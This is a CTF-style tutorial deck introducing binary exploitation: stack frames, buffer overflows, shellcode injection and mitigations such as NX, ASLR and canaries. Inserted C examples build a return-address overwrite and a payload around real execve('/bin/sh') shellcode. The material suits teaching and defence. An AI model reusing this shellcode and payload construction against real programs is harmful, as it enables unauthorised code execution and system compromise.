
Introduction to Binary Exploitation

Published in: Software

  1. An Intro to Binary Exploitation – Aswin M Guptha (@aswinmguptha)
  2. $whoami ● BTech 2nd year undergraduate ● Amrita University ● Regular CTF player ● Team bi0s ● Focus on binary exploitation and web exploitation
  3. Aim ● Give you a better understanding of the mechanics of software exploitation ● Prepare you to identify vulnerabilities in program source code ● Help you understand the HOW and WHY of exploit mitigation technologies ● We will cover a few key concepts in depth
  4. Course Outline ● Basic stack overflows ● Shellcode injection ● Other vulnerability scenarios ● Recognizing vulnerabilities ● Exploit mitigation technologies
  5. Why? ● Known and documented by the late 90s ● Still relevant? ● The 2016 scenario ● Your weakness, my strength
  6. Let's get down to business
  7. What is our goal? ● Arbitrary code execution ● Examples: ● Forcing a binary to give root access over the internet! ● Forcing an administrator-privileged process to execute code of our choosing
  8. First attempt: but this worked in the movies...
  9. Real life ● We don't know the password, and it is really hard to guess. ● There is a function in the program that gives a shell. ● What if we could change the flow of execution and execute that function? What does that mean?
  10. Process Memory Organization ● Sections of a compiled program: ● Executable section: TEXT – the code that will actually be executed ● Initialized data: DATA – global variables with an initial value ● Uninitialized data: BSS – global variables without an initial value (zero-filled at load time) ● Local variables belong to none of these sections: they live on the stack, in the frame of the function that declares them
  11. x86 Review ● Function calls ● Returning after a function call ● The instruction pointer (eip) ● The stack
  12. The Stack
  13. The Stack
  14. The Stack – the caller pushes the arguments right to left, `call` pushes the return address, and the callee reads its arguments relative to esp:

      push j               ; second argument
      push i               ; first argument
      call add             ; pushes the address of the next instruction, jumps to add
      add esp, 0x8         ; caller removes the two arguments (cdecl)
      ...
  add:
      mov eax, [esp+0x4]   ; i   ([esp] itself holds the return address)
      mov ebx, [esp+0x8]   ; j
      add eax, ebx
      ret                  ; pops the return address into eip
  15. Buffer Overflow
  16. Buffer Overflow

      #include <stdio.h>

      int main(void) {
          char buffer[16];
          int var;
          return 0;
      }

      Stack frame of main, from the top of the stack (low addresses) to the bottom of the stack (high addresses):

      | buffer (16) | var (4) | sfp (4) | ret (4) |
      low memory / top of stack ---------------> high memory / bottom of stack

  17. Buffer Overflow – let's do some challenges ● #1 overwrite ● #2 validate
  18. Buffer Overflow

      #include <string.h>

      void function(char *str) {
          char buffer[16];
          strcpy(buffer, str);   /* no length check: copies until the NUL in str */
      }

      int main(void) {
          char large_string[256];
          int i;
          for (i = 0; i < 255; i++) {
              large_string[i] = 'A';
          }
          large_string[255] = '\0';   /* terminate, so strcpy copies exactly 255 'A's */
          function(large_string);
          return 0;
      }

  19. Buffer Overflow

      | buffer (16)      | sfp  | ret  | *str | ...
      | AAAAAAAAAAAAAAAA | AAAA | AAAA | AAAA | AAAA...
      low memory / top of stack ---------------> high memory / bottom of stack

      ● The saved return address is overwritten with 'AAAA' (0x41414141)
      ● When function returns, eip is loaded with 0x41414141 and the CPU tries to fetch the next instruction from there
      ● That address is not mapped, so the process dies with a segmentation fault. So what???
  20. Buffer Overflow ● We have seen how to crash our own program by overwriting the return address of a function. ● What if we could overwrite the return address with a valid address instead? Let's carry on from where we stopped!!!
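A worked model of slides 16 to 20, added here and not part of the original deck. The frame is written out as a struct so the layout is deterministic (a real compiler may order or pad locals differently), the copy is a model of strcpy with no bounds check, and the "good" saved eip and saved ebp values are made up for the demo. It shows what lands in var and in the saved return address for a given input, and the padding an exploit needs to reach ret.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The frame of slide 16, lowest address first: strcpy writes upward,
   so anything past buffer[15] lands in var, then sfp, then ret. */
struct frame {
    char     buffer[16];
    uint32_t var;
    uint32_t sfp;   /* saved ebp */
    uint32_t ret;   /* saved eip: where `ret` will jump */
};

#define GOOD_RET 0x08048500u   /* assumed legitimate return address */
#define GOOD_SFP 0xbffff700u   /* assumed saved frame pointer */

/* Model of strcpy(buffer, str): copies up to and including the NUL with no
   bounds check. The copy is clamped at the end of the struct only so the
   demo never writes outside the object it models. */
static void unchecked_copy(struct frame *f, const char *str) {
    size_t n = strlen(str) + 1;
    if (n > sizeof *f) n = sizeof *f;
    memcpy(f, str, n);
}

/* Builds the attacker string: pad bytes of 'A', then target in little-endian
   byte order (x86), then the terminating NUL. out must hold pad + 5 bytes. */
void build_input(char *out, size_t pad, uint32_t target) {
    memset(out, 'A', pad);
    for (int i = 0; i < 4; i++) out[pad + i] = (char)(target >> (8 * i));
    out[pad + 4] = '\0';
}

/* Copies build_input(pad, target) into a fresh frame and returns the result. */
static struct frame smash(size_t pad, uint32_t target) {
    struct frame f = { {0}, 0, GOOD_SFP, GOOD_RET };
    char input[64];
    if (pad > sizeof input - 5) pad = sizeof input - 5;
    build_input(input, pad, target);
    unchecked_copy(&f, input);
    return f;
}

/* What var and the saved eip contain after the overflow. */
uint32_t var_after(size_t pad, uint32_t target) { return smash(pad, target).var; }
uint32_t ret_after(size_t pad, uint32_t target) { return smash(pad, target).ret; }

/* Distance from buffer[0] to the saved eip: the padding an exploit needs. */
size_t ret_offset(void) { return offsetof(struct frame, ret); }

int main(void) {
    printf("offset of saved eip from buffer[0]: %zu\n", ret_offset());
    printf("32 x 'A' (slide 19): ret = 0x%08x\n", ret_after(32, 0x41414141u));
    printf("16 x 'A' + BBBB: var = 0x%08x, ret = 0x%08x (ret untouched)\n",
           var_after(16, 0x42424242u), ret_after(16, 0x42424242u));
    printf("24 x 'A' + chosen address (slide 20): ret = 0x%08x\n",
           ret_after(ret_offset(), 0xdeadbeefu));
    return 0;
}
```

The second case is the "overwrite" challenge of slide 17: sixteen bytes of padding reach var without touching the return address, which is enough when the goal is to flip a variable rather than redirect execution. The third case is slide 20: with exactly ret_offset() bytes of padding the next four bytes become the new eip, written least-significant byte first because x86 is little-endian.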
  21. Buffer Overflow ● Is anyone mad enough to put a function that hands out a shell into their program? ● So what is the use of this? ● That is where shellcode injection comes in.
  22. Shellcode
  23. Shellcode ● A short, hand-crafted sequence of machine instructions ● Executed once it has been injected into a running process and control has been redirected to it (the name comes from its classic job: spawning a shell).
  24. Shellcode – properties of a shellcode: – Small enough to fit in the buffer it is injected into – No NUL (0x00) bytes, because strcpy and similar routines stop copying at the first NUL and the rest of the payload would never land – Position independent: no references to the data section or any other absolute address, because the injected code runs from wherever the buffer happens to be
  25. Shellcode – what's next? – Okay, we know what shellcode is; now what? ● Put the shellcode at the start of the buffer ● Fill the rest of the buffer (and the saved frame pointer) with junk ● Overwrite the saved eip with the address of the buffer, so `ret` jumps into the shellcode
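The checks of slide 24 and the payload layout of slide 25, as an added example that is not code from the deck. The shellcode bytes are a widely published 23-byte 32-bit Linux execve("/bin/sh") sequence; the buffer size (64 bytes, laid out as on slide 19 with sfp and ret directly above it) and the buffer's address (the value one would read off in a debugger) are assumed for the demo. The payload is only built and checked here, never executed.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* 23-byte 32-bit Linux execve("/bin//sh", ["/bin//sh", NULL], ...) shellcode.
   Never executed here; the example only builds and checks a payload around it. */
static const unsigned char shellcode[] = {
    0x31, 0xc0,                          /* xor  eax, eax                  */
    0x50,                                /* push eax          ; NUL        */
    0x68, 0x2f, 0x2f, 0x73, 0x68,        /* push "//sh"                    */
    0x68, 0x2f, 0x62, 0x69, 0x6e,        /* push "/bin"                    */
    0x89, 0xe3,                          /* mov  ebx, esp     ; path       */
    0x50,                                /* push eax          ; argv end   */
    0x53,                                /* push ebx          ; argv[0]    */
    0x89, 0xe1,                          /* mov  ecx, esp     ; argv       */
    0xb0, 0x0b,                          /* mov  al, 11       ; execve     */
    0xcd, 0x80                           /* int  0x80                      */
};
#define SHELLCODE_LEN (sizeof shellcode)

/* Slide 24, property 2: a 0x00 byte would stop strcpy before the whole
   payload is in place, so neither the shellcode nor the payload may hold one. */
int has_null(const unsigned char *p, size_t n) {
    for (size_t i = 0; i < n; i++)
        if (p[i] == 0) return 1;
    return 0;
}

/* Slide 25 layout for a buffer of buflen bytes with sfp and ret right above it:
   [shellcode][junk to end of buffer][4 junk bytes over sfp][buf_addr over ret]
   Returns the payload length written to out, or 0 if the payload cannot be
   delivered with strcpy (shellcode too big, out too small, or a NUL byte). */
size_t build_payload(unsigned char *out, size_t outcap,
                     size_t buflen, uint32_t buf_addr) {
    size_t total = buflen + 4 + 4;           /* buffer + saved ebp + saved eip */
    if (SHELLCODE_LEN > buflen || total + 1 > outcap) return 0;
    memcpy(out, shellcode, SHELLCODE_LEN);
    memset(out + SHELLCODE_LEN, 0x90, total - 4 - SHELLCODE_LEN); /* junk (NOPs) */
    for (int i = 0; i < 4; i++)              /* little-endian return address */
        out[total - 4 + i] = (unsigned char)(buf_addr >> (8 * i));
    out[total] = 0;                          /* the NUL strcpy stops on */
    return has_null(out, total) ? 0 : total; /* e.g. 0x0804xxxx addresses contain 0x00 */
}

int main(void) {
    unsigned char payload[128];
    /* Assumed for the demo: a 64-byte buffer at 0xbffffc40, as read off in gdb. */
    size_t n = build_payload(payload, sizeof payload, 64, 0xbffffc40u);
    printf("payload length: %zu (shellcode %zu bytes, null-free: %s)\n",
           n, SHELLCODE_LEN, has_null(shellcode, SHELLCODE_LEN) ? "no" : "yes");
    for (size_t i = 0; i < n; i++)
        printf("%02x%s", payload[i], (i + 1) % 16 ? " " : "\n");
    printf("\n16-byte buffer: %zu (too small for this shellcode)\n",
           build_payload(payload, sizeof payload, 16, 0xbffffc40u));
    return 0;
}
```

Two failure modes from slide 24 are made explicit: a 16-byte buffer cannot hold this 23-byte shellcode, and a return address with a 0x00 byte (typical for a non-PIE text segment at 0x0804xxxx) cannot be delivered through strcpy, which is one reason the target of the return is the stack buffer itself. Slide 30's NX and ASLR are aimed at exactly this payload: NX stops the buffer from being executed, and ASLR makes buf_addr unknown in advance.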
  26. Shellcode – ready, set, go
  27. The battle continues... ● ret2libc ● ROP (return-oriented programming) ● Format string vulnerabilities ● Heap vulnerabilities ● And so on...
  28. What's next? ● Google is your best friend! ● "Smashing The Stack For Fun And Profit" by Aleph One (Phrack 49, 1996) ● And YES, CTFs!
  29. In a nutshell ● Changing the flow of execution – buffer overflow ● Injecting your own code – shellcode injection ● Vulnerability detection and prevention. The rest I leave to you. Good luck! Queries? Ping @aswinmguptha
  30. Becoming stronger! ● NX – memory pages are either writable or executable, but NOT both, so shellcode written into a stack buffer cannot be executed ● ASLR – Address Space Layout Randomization: stack, heap and library addresses change on every run, so the address to return to is not known in advance ● Canary – the stack protector: a random value placed between the local buffers and the saved frame pointer/return address and checked before the function returns; an overflow that reaches ret also changes the canary and the program aborts ● PIE – Position Independent Executable: lets ASLR randomize the program's own code and data as well, not only the libraries (it complements ASLR rather than protecting the stack)